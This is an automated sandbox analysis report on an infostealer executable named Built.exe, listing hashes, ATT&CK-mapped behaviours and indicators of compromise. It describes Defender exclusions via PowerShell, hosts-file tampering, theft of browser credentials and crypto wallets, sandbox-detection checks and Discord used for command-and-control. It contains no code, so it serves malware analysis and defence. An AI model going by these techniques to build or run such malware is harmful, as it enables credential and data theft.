d7b9e8e4f4b9f1edc5b00d2e41f3c8bbc258bef7a8e79b69d293cc2e1b428dc0

Analysis

max time kernel
57s
max time network
63s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
12/05/2024, 14:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

33.5MB
MD5

9e6be6ca29f1e552e565a5164d315f0f
SHA1

7096e43342e8dd1651400315ca3718bdeee324dd
SHA256

d7b9e8e4f4b9f1edc5b00d2e41f3c8bbc258bef7a8e79b69d293cc2e1b428dc0
SHA512

8895ea28c889b3527e1cf9e2adebdaa49dd1ad6bd861b554f8fb7cb3a03f9c44e0c72aeec97fd8d557d7fcc7470991b7044dfb0e1ea7465d866f1289ce8c6c08
SSDEEP

786432:Q1cuoKYleejYhHT8A4xBwMZ9kb150v2MFekWGQ5ntc+RKy/pWaWV:IxAeejYhHTt4DwM/kB5Q/jQc6B3WV

Score

8^/10

execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1248	powershell.exe
2948	powershell.exe
3952	powershell.exe
3284	powershell.exe

Drops file in Drivers directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Built.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\SET6CE3.tmp	DrvInst.exe
File created	C:\Windows\System32\drivers\SET6CE3.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\drivers\dcdbas64.sys	DrvInst.exe

Executes dropped EXE 7 IoCs

pid	Process
3960	bound.exe
5024	miniunz.exe
2672	hapint.exe
1788	dcmdev64.exe
1192	dcmdev64.exe
3936	dchcfg32.exe
4704	rar.exe

Loads dropped DLL 21 IoCs

pid	Process
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
3456	Built.exe
5024	miniunz.exe
3936	dchcfg32.exe
3936	dchcfg32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023476-63.dat	upx
behavioral2/memory/3456-67-0x00007FF815910000-0x00007FF815EF8000-memory.dmp	upx
behavioral2/files/0x0007000000023440-69.dat	upx
behavioral2/files/0x0007000000023474-71.dat	upx
behavioral2/files/0x0007000000023445-125.dat	upx
behavioral2/memory/3456-127-0x00007FF82DBE0000-0x00007FF82DBEF000-memory.dmp	upx
behavioral2/memory/3456-126-0x00007FF82AD50000-0x00007FF82AD74000-memory.dmp	upx
behavioral2/files/0x0007000000023444-124.dat	upx
behavioral2/files/0x0007000000023443-123.dat	upx
behavioral2/files/0x0007000000023442-122.dat	upx
behavioral2/files/0x0007000000023441-121.dat	upx
behavioral2/files/0x000700000002343f-120.dat	upx
behavioral2/files/0x000700000002347c-119.dat	upx
behavioral2/files/0x000700000002347a-118.dat	upx
behavioral2/files/0x0007000000023479-117.dat	upx
behavioral2/files/0x0007000000023475-114.dat	upx
behavioral2/files/0x0007000000023473-113.dat	upx
behavioral2/memory/3456-132-0x00007FF8286F0000-0x00007FF82871D000-memory.dmp	upx
behavioral2/memory/3456-134-0x00007FF825230000-0x00007FF825253000-memory.dmp	upx
behavioral2/memory/3456-133-0x00007FF82AAA0000-0x00007FF82AAB9000-memory.dmp	upx
behavioral2/memory/3456-135-0x00007FF815790000-0x00007FF815903000-memory.dmp	upx
behavioral2/memory/3456-136-0x00007FF8287E0000-0x00007FF8287F9000-memory.dmp	upx
behavioral2/memory/3456-137-0x00007FF828A90000-0x00007FF828A9D000-memory.dmp	upx
behavioral2/memory/3456-138-0x00007FF825200000-0x00007FF82522E000-memory.dmp	upx
behavioral2/memory/3456-139-0x00007FF8245D0000-0x00007FF824688000-memory.dmp	upx
behavioral2/memory/3456-140-0x00007FF815410000-0x00007FF815785000-memory.dmp	upx
behavioral2/memory/3456-142-0x00007FF815910000-0x00007FF815EF8000-memory.dmp	upx
behavioral2/memory/3456-145-0x00007FF82AD50000-0x00007FF82AD74000-memory.dmp	upx
behavioral2/memory/3456-144-0x00007FF8251D0000-0x00007FF8251DD000-memory.dmp	upx
behavioral2/memory/3456-143-0x00007FF8251E0000-0x00007FF8251F4000-memory.dmp	upx
behavioral2/memory/3456-146-0x00007FF8286F0000-0x00007FF82871D000-memory.dmp	upx
behavioral2/memory/3456-162-0x00007FF80DC50000-0x00007FF80DD6C000-memory.dmp	upx
behavioral2/memory/3456-161-0x00007FF825230000-0x00007FF825253000-memory.dmp	upx
behavioral2/memory/3456-335-0x00007FF815790000-0x00007FF815903000-memory.dmp	upx
behavioral2/memory/3456-470-0x00007FF815910000-0x00007FF815EF8000-memory.dmp	upx
behavioral2/memory/3456-485-0x00007FF8287E0000-0x00007FF8287F9000-memory.dmp	upx
behavioral2/memory/3456-481-0x00007FF815410000-0x00007FF815785000-memory.dmp	upx
behavioral2/memory/3456-480-0x00007FF8245D0000-0x00007FF824688000-memory.dmp	upx
behavioral2/memory/3456-479-0x00007FF825200000-0x00007FF82522E000-memory.dmp	upx
behavioral2/memory/3456-476-0x00007FF815790000-0x00007FF815903000-memory.dmp	upx
behavioral2/memory/3456-471-0x00007FF82AD50000-0x00007FF82AD74000-memory.dmp	upx
behavioral2/memory/3456-535-0x00007FF8251D0000-0x00007FF8251DD000-memory.dmp	upx
behavioral2/memory/3456-546-0x00007FF815410000-0x00007FF815785000-memory.dmp	upx
behavioral2/memory/3456-548-0x00007FF8251E0000-0x00007FF8251F4000-memory.dmp	upx
behavioral2/memory/3456-541-0x00007FF815790000-0x00007FF815903000-memory.dmp	upx
behavioral2/memory/3456-545-0x00007FF8245D0000-0x00007FF824688000-memory.dmp	upx
behavioral2/memory/3456-544-0x00007FF825200000-0x00007FF82522E000-memory.dmp	upx
behavioral2/memory/3456-543-0x00007FF828A90000-0x00007FF828A9D000-memory.dmp	upx
behavioral2/memory/3456-542-0x00007FF8287E0000-0x00007FF8287F9000-memory.dmp	upx
behavioral2/memory/3456-540-0x00007FF82AAA0000-0x00007FF82AAB9000-memory.dmp	upx
behavioral2/memory/3456-539-0x00007FF825230000-0x00007FF825253000-memory.dmp	upx
behavioral2/memory/3456-538-0x00007FF8286F0000-0x00007FF82871D000-memory.dmp	upx
behavioral2/memory/3456-537-0x00007FF82DBE0000-0x00007FF82DBEF000-memory.dmp	upx
behavioral2/memory/3456-536-0x00007FF82AD50000-0x00007FF82AD74000-memory.dmp	upx
behavioral2/memory/3456-534-0x00007FF80DC50000-0x00007FF80DD6C000-memory.dmp	upx
behavioral2/memory/3456-520-0x00007FF815910000-0x00007FF815EF8000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
33	discord.com
34	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com
31	ip-api.com

Drops file in System32 directory 20 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3eab87b7-5f96-8b47-86ff-d6120bedd2ef}\SET6BEA.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{3eab87b7-5f96-8b47-86ff-d6120bedd2ef}\SET6BEA.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3eab87b7-5f96-8b47-86ff-d6120bedd2ef}\SET6BEB.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\dcdbas64.inf_amd64_a841ee86c9054002\dcdbas64.sys	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\dcdbas64.inf_amd64_a841ee86c9054002\dcdbas64.PNF	dcmdev64.exe
File created	C:\Windows\SysWOW64\dchbas32.dll	hapint.exe
File created	C:\Windows\System32\DriverStore\Temp\{3eab87b7-5f96-8b47-86ff-d6120bedd2ef}\SET6BE9.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\dcdbas64.inf_amd64_a841ee86c9054002\dcdbas64.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3eab87b7-5f96-8b47-86ff-d6120bedd2ef}\dcdbas64.inf	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{3eab87b7-5f96-8b47-86ff-d6120bedd2ef}\SET6BEB.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\dcdbas64.inf_amd64_a841ee86c9054002\dcdbas64.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3eab87b7-5f96-8b47-86ff-d6120bedd2ef}\SET6BE9.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3eab87b7-5f96-8b47-86ff-d6120bedd2ef}\dcdbas64.cat	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3eab87b7-5f96-8b47-86ff-d6120bedd2ef}\dcdbas64.sys	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{3eab87b7-5f96-8b47-86ff-d6120bedd2ef}	DrvInst.exe
File opened for modification	C:\Windows\SysWOW64\dchbas32.dll	hapint.exe
File created	C:\Windows\SysWOW64\dchapi32.dll	hapint.exe
File created	C:\Windows\SysWOW64\dchcfl32.dll	hapint.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\hapint.exe	hapint.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\inf\oem3.inf	DrvInst.exe
File created	C:\Windows\dcmdev64.exe	hapint.exe
File created	C:\Windows\dchcfg32.exe	hapint.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	dcmdev64.exe
File opened for modification	C:\Windows\inf\oem3.inf	DrvInst.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom	dcmdev64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	dcmdev64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	dcmdev64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Filters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\LowerFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Filters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\UpperFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dcmdev64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs	dcmdev64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dcmdev64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dcmdev64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	dcmdev64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002	dcmdev64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Filters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dcmdev64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dcmdev64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Filters	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dcmdev64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	dcmdev64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dcmdev64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	dcmdev64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LowerFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	DrvInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	dcmdev64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001	dcmdev64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom	dcmdev64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs	dcmdev64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\UpperFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	dcmdev64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\UpperFilters	DrvInst.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs	dcmdev64.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	dcmdev64.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2972	WMIC.exe
2864	WMIC.exe
3500	WMIC.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery

T1057

pid	Process
3164	tasklist.exe
4620	tasklist.exe
4412	tasklist.exe
4424	tasklist.exe
4672	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5036	systeminfo.exe

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3936	PING.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
1248	powershell.exe
1248	powershell.exe
3344	powershell.exe
3344	powershell.exe
3344	powershell.exe
2948	powershell.exe
2948	powershell.exe
2948	powershell.exe
3952	powershell.exe
3952	powershell.exe
2996	powershell.exe
2996	powershell.exe
3952	powershell.exe
3952	powershell.exe
2996	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
2692	powershell.exe
2692	powershell.exe
